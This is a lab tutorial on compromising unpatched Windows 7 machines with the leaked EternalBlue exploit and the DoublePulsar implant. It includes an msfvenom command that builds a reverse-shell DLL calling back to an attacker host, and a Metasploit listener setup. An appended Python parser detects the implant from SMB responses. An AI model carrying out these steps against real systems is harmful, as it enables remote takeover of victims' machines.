Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

A few weeks back, two hacking groups, ShadowBrokers and Equation Group, managed to leak the NSA’s version of the hacking toolkit “FuzzBunch”, which can be maliciously used to compromise any Windows 7 or Server 2008 R2 (x64) machine, all service packs, without needing authentication.

The FuzzBunch toolkit comes with a pre-cooked exploit, EternalBlue, that exploits a Windows SMB vulnerability, and a plugin, DoublePulsar. For your information, the same exploit code was taken advantage of to create the WannaCry ransomware, which had a big impact on computer networks all around the world.

With all that happened, I decided to document the step-by-step approach of hacking a Windows 7 machine with the FuzzBunch toolkit. So let’s get started.

Note: This tutorial is just for informational and educational purposes, the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or a group.

Environment:

  • Windows 7: 10.21.1.118: Attacking machine with FuzzBunch installed (installing FuzzBunch has a few dependencies, such as python-2.6 and pywin32-212)
  • Kali: 10.21.1.119: Second attacking machine, used for creating the malicious DLL and for gaining access
  • Windows 7: 10.21.1.124: Victim

  1. Once you have the setup ready, execute “python fb.py” on the Windows attacking machine to initialize the FuzzBunch toolkit.
  2. Next, configure the victim IP, fallback IP (the attacking Windows 7 machine), redirection, project name and log directory.
  3. The first step in exploitation is to select the EternalBlue exploit. At the FuzzBunch prompt type “use EternalBlue” and press enter to configure the available options, such as target IP, port, target OS, etc.
  4. Once you are done it will ask you to execute EternalBlue; press enter to execute it against the target.
  5. As you can see, the target is successfully exploited and we should see the message “Eternalblue Succeeded”.
  6. Now it’s time to gain access to the machine using the backdoor that was installed. For this purpose we will use “msfvenom”, available in Kali, to create a malicious DLL and inject it through the “DoublePulsar” plugin.
  7. Execute the msfvenom command below to create the malicious DLL: “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the DLL to the Windows attacking machine so it can be injected while using the DoublePulsar plugin.
  9. Launch the plugin by typing “use Doublepulsar” and configure the target IP, port, protocol, target OS architecture, malicious DLL to be injected, etc.
  10. Before you execute the plugin, open Metasploit, load “exploit/multi/handler” with the same payload used when creating the DLL, and start listening.
  11. Now you are good to launch the “DoublePulsar” plugin; if all goes well you will successfully exploit the target and gain access.

Follow similar steps to replicate the scenario in your test lab. Feel free to contact me if you have any queries: charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.
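As an added defender-side example (not code from the original post or from FuzzBunch), the parser below reads an SMB1 Trans2 response header and applies the published DoublePulsar fingerprint that the Metasploit scanner mentioned above uses: a host running the implant answers a Trans2 SESSION_SETUP probe sent with multiplex ID 0x41 using multiplex ID 0x51, while a clean host echoes 0x41. The packets here are constructed samples, and the probe itself is not sent; only the response-side check is shown.

```python
import struct

NETBIOS_HDR_LEN = 4          # NetBIOS session header precedes the SMB1 header
SMB1_HDR_LEN = 32
SMB_COM_TRANSACTION2 = 0x32
PROBE_MID = 0x41             # multiplex ID used in the detection probe
DOUBLEPULSAR_MID = 0x51      # implant answers with PROBE_MID + 0x10
STATUS_NOT_IMPLEMENTED = 0xC0000002


def parse_smb1_header(packet):
    """Return the SMB1 header fields of a NetBIOS-framed packet, or None."""
    if len(packet) < NETBIOS_HDR_LEN + SMB1_HDR_LEN:
        return None
    smb = packet[NETBIOS_HDR_LEN:NETBIOS_HDR_LEN + SMB1_HDR_LEN]
    if smb[:4] != b"\xffSMB":
        return None
    # Offsets 4..13: Command, Status, Flags, Flags2, PIDHigh (little-endian)
    command, status, flags, flags2, _pid_hi = struct.unpack_from("<BIBHH", smb, 4)
    # Offsets 24..31: TID, PIDLow, UID, MID
    tid, pid_lo, uid, mid = struct.unpack_from("<HHHH", smb, 24)
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "tid": tid, "pid": pid_lo, "uid": uid, "mid": mid}


def classify_trans2_response(packet):
    """Classify a server's reply to the Trans2 SESSION_SETUP probe."""
    hdr = parse_smb1_header(packet)
    if hdr is None or hdr["command"] != SMB_COM_TRANSACTION2:
        return "not-smb1-trans2"
    if hdr["mid"] == DOUBLEPULSAR_MID:
        return "doublepulsar-implant"
    if hdr["mid"] == PROBE_MID:
        return "clean"
    return "unknown"


def build_sample_response(mid, status=STATUS_NOT_IMPLEMENTED):
    """Constructed sample reply (not a real capture) with the given MID."""
    hdr = (b"\xffSMB"
           + struct.pack("<BIBHH", SMB_COM_TRANSACTION2, status, 0x98, 0xC807, 0)
           + b"\x00" * 8 + b"\x00\x00"            # SecurityFeatures, Reserved
           + struct.pack("<HHHH", 0, 0xFEFF, 0, mid))
    body = b"\x00" + b"\x00\x00"                  # WordCount=0, ByteCount=0
    payload = hdr + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


if __name__ == "__main__":
    for m in (PROBE_MID, DOUBLEPULSAR_MID):
        print(hex(m), classify_trans2_response(build_sample_response(m)))
```

The same check can be run over responses pulled from a packet capture of the probe rather than the constructed samples.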
